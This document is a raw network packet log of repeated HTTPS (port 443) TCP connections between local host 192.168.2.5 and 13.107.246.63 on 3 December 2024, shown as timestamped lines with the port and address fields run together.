                                Dec 3, 2024 17:51:24.181397915 CET50003443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:24.181411982 CET4435000313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:24.181427002 CET50003443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:24.181432009 CET4435000313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:24.184523106 CET50008443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:24.184552908 CET4435000813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:24.185779095 CET50008443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:24.185911894 CET50008443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:24.185923100 CET4435000813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:24.478856087 CET4435000413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:24.478921890 CET4435000413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:24.479006052 CET50004443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:24.479249001 CET50004443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:24.479262114 CET4435000413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:24.479295969 CET50004443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:24.479300976 CET4435000413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:24.482356071 CET50009443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:24.482393026 CET4435000913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:24.482579947 CET50009443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:24.482625008 CET50009443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:24.482631922 CET4435000913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:24.609234095 CET4435000513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:24.616291046 CET50005443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:24.616321087 CET4435000513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:24.616808891 CET50005443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:24.616815090 CET4435000513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:24.679351091 CET4435000613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:24.683171034 CET50006443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:24.683188915 CET4435000613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:24.683710098 CET50006443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:24.683715105 CET4435000613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.053515911 CET4435000513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.053579092 CET4435000513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.053755045 CET50005443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.105772972 CET50005443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.105772972 CET50005443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.105806112 CET4435000513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.105833054 CET4435000513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.112198114 CET50010443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.112251997 CET4435001013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.116295099 CET50010443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.119757891 CET50010443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.119784117 CET4435001013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.127300978 CET4435000613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.127367973 CET4435000613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.129020929 CET50006443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.130610943 CET50006443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.130637884 CET4435000613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.130655050 CET50006443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.130661964 CET4435000613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.185112953 CET50011443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.185152054 CET4435001113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.188908100 CET50011443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.216295004 CET50011443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.216311932 CET4435001113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.725178003 CET4435000713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.810429096 CET50007443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.810461998 CET4435000713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.810921907 CET50007443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:25.810934067 CET4435000713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:25.991415977 CET4435000813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.004363060 CET50008443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.004386902 CET4435000813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.004854918 CET50008443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.004859924 CET4435000813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.165287018 CET4435000713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.165359974 CET4435000713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.177247047 CET50007443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.201976061 CET50007443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.202001095 CET4435000713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.202013016 CET50007443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.202018976 CET4435000713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.214015007 CET50012443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.214031935 CET4435001213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.217709064 CET50012443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.229155064 CET50012443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.229163885 CET4435001213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.312798023 CET4435000913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.382136106 CET50009443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.382167101 CET4435000913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.382621050 CET50009443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.382630110 CET4435000913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.440457106 CET4435000813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.440506935 CET4435000813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.451328039 CET4435000813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.459844112 CET50008443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.493145943 CET50008443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.493172884 CET4435000813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.493185997 CET50008443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.493192911 CET4435000813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.496633053 CET50013443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.496669054 CET4435001313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.496916056 CET50013443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.497051954 CET50013443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.497071028 CET4435001313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.757035971 CET4435000913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.757093906 CET4435000913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.772483110 CET50009443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.832209110 CET50009443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.832237005 CET4435000913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.832282066 CET50009443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:26.832289934 CET4435000913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:26.921366930 CET4435001013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.013135910 CET50010443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.025990963 CET4435001113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.042160988 CET50010443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.042179108 CET4435001013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.042901993 CET50010443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.042906046 CET4435001013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.056201935 CET50014443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.056266069 CET4435001413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.073750019 CET50014443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.077843904 CET50011443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.077864885 CET4435001113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.078346968 CET50011443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.078360081 CET4435001113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.099103928 CET50014443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.099126101 CET4435001413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.371503115 CET4435001013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.371562958 CET4435001013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.376492023 CET50010443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.470341921 CET4435001113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.470397949 CET4435001113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.477365017 CET50011443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.487802982 CET50010443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.487835884 CET4435001013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.487852097 CET50010443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.487859011 CET4435001013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.529764891 CET50011443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.529764891 CET50011443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.529795885 CET4435001113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.529812098 CET4435001113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.714137077 CET50015443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.714178085 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.714734077 CET50015443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.715742111 CET50016443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.715779066 CET4435001613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.715958118 CET50016443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.779386997 CET50015443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.779409885 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:27.779850006 CET50016443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:27.779881954 CET4435001613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.028012037 CET4435001213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.118683100 CET50012443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.118706942 CET4435001213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.119265079 CET50012443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.119271040 CET4435001213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.141474009 CET4435001313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.204565048 CET50013443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.378822088 CET50013443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.378842115 CET4435001313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.379394054 CET50013443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.379404068 CET4435001313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.480613947 CET4435001213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.480690956 CET4435001213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.487524033 CET50012443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.672389030 CET50012443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.672389030 CET50012443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.672416925 CET4435001213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.672426939 CET4435001213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.697947025 CET50017443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.697973967 CET4435001713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.705302000 CET50017443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.710712910 CET50017443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.710725069 CET4435001713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.714360952 CET4435001313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.714416981 CET4435001313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.716331959 CET50013443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.716442108 CET50013443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.716459990 CET4435001313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.716471910 CET50013443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.716491938 CET4435001313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.729573011 CET50018443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.729594946 CET4435001813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.733150005 CET50018443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.741427898 CET50018443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.741446018 CET4435001813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.953922033 CET4435001413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.957798958 CET50014443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.957822084 CET4435001413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:28.958317041 CET50014443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:28.958322048 CET4435001413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.593569040 CET4435001413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.593636990 CET4435001413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.593856096 CET50014443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.594322920 CET50014443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.594340086 CET4435001413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.594352961 CET50014443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.594358921 CET4435001413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.599569082 CET50019443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.599622011 CET4435001913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.599704981 CET50019443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.599908113 CET50019443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.599929094 CET4435001913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.708322048 CET4435001613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.717504025 CET50016443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.717531919 CET4435001613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.718012094 CET50016443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.718015909 CET4435001613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.733685017 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.734232903 CET50015443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.734252930 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:29.734695911 CET50015443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:29.734702110 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.155858040 CET4435001613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.155914068 CET4435001613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.158936977 CET50016443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.160249949 CET50016443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.160270929 CET4435001613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.160284996 CET50016443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.160290956 CET4435001613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.197010994 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.197087049 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.207318068 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.207562923 CET50015443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.267947912 CET50015443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.267976046 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.267988920 CET50015443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.267996073 CET4435001513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.319467068 CET50020443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.319494963 CET4435002013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.319915056 CET50021443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.319967031 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.320347071 CET50020443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.320352077 CET50021443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.320802927 CET50020443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.320813894 CET4435002013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.320941925 CET50021443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.320957899 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.649058104 CET4435001713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.653831005 CET4435001813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.709352970 CET50017443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.709372044 CET4435001713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.709855080 CET50017443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.709858894 CET4435001713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.710078001 CET50018443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.710088015 CET4435001813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:30.710433960 CET50018443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:30.710438013 CET4435001813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.093652964 CET4435001713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.093725920 CET4435001713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.095750093 CET50017443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.099260092 CET4435001813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.099350929 CET4435001813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.115869045 CET50018443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.134983063 CET50017443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.134995937 CET4435001713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.135009050 CET50017443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.135013103 CET4435001713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.254241943 CET50018443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.254241943 CET50018443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.254285097 CET4435001813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.254298925 CET4435001813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.317389011 CET4435001913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.439268112 CET50019443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.851402998 CET50019443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.851428986 CET4435001913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.851893902 CET50019443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.851897955 CET4435001913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.858807087 CET50022443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.858850002 CET4435002213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.860312939 CET50023443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.860387087 CET4435002313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.868406057 CET50022443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.868629932 CET50022443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.868643999 CET4435002213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:31.868676901 CET50023443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.880515099 CET50023443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:31.880532980 CET4435002313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.234842062 CET4435001913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.234913111 CET4435001913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.235472918 CET50019443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.235790968 CET50019443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.235790968 CET50019443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.235804081 CET4435001913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.235810995 CET4435001913.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.241450071 CET50024443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.241497993 CET4435002413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.244461060 CET50024443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.244972944 CET50024443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.244985104 CET4435002413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.388689041 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.389272928 CET50021443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.389316082 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.389803886 CET50021443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.389813900 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.560084105 CET4435002013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.609822989 CET50020443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.609898090 CET4435002013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.610312939 CET50020443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:32.610327005 CET4435002013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.947742939 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.947807074 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.955336094 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:32.959779978 CET50021443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.052840948 CET50021443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.052874088 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.052908897 CET50021443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.052916050 CET4435002113.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.067600965 CET50025443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.067641020 CET4435002513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.067737103 CET50025443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.067898035 CET50025443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.067913055 CET4435002513.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.088037968 CET4435002013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.088129997 CET4435002013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.088387012 CET50020443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.088416100 CET50020443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.088416100 CET50020443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.088429928 CET4435002013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.088438034 CET4435002013.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.091603994 CET50026443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.091646910 CET4435002613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.091871977 CET50026443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.092051029 CET50026443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.092067003 CET4435002613.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.817120075 CET4435002213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.821743011 CET50022443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.821760893 CET4435002213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.822231054 CET50022443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:33.822237015 CET4435002213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:33.916999102 CET4435002313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.006669044 CET50023443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.006697893 CET4435002313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.007158995 CET50023443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.007165909 CET4435002313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.254081964 CET4435002413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.307996988 CET4435002213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.308092117 CET4435002213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.310688972 CET50022443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.330920935 CET50024443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.390537977 CET50024443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.390557051 CET4435002413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.391047955 CET50024443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.391052961 CET4435002413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.419228077 CET50022443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.419228077 CET50022443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.419261932 CET4435002213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.419276953 CET4435002213.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.438139915 CET50027443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.438179016 CET4435002713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.438879013 CET50027443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.439909935 CET50027443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.439919949 CET4435002713.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.481393099 CET4435002313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.481465101 CET4435002313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.492418051 CET50023443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.548774958 CET50023443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.548803091 CET4435002313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.548815012 CET50023443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.548820972 CET4435002313.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.706613064 CET4435002413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.706701040 CET4435002413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.714689970 CET50024443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.749725103 CET50024443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.749752045 CET4435002413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.749764919 CET50024443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.749772072 CET4435002413.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.767129898 CET50028443192.168.2.513.107.246.63
                                Dec 3, 2024 17:51:34.767182112 CET4435002813.107.246.63192.168.2.5
                                Dec 3, 2024 17:51:34.768420935 CET50028443192.168.2.513.107.246.63
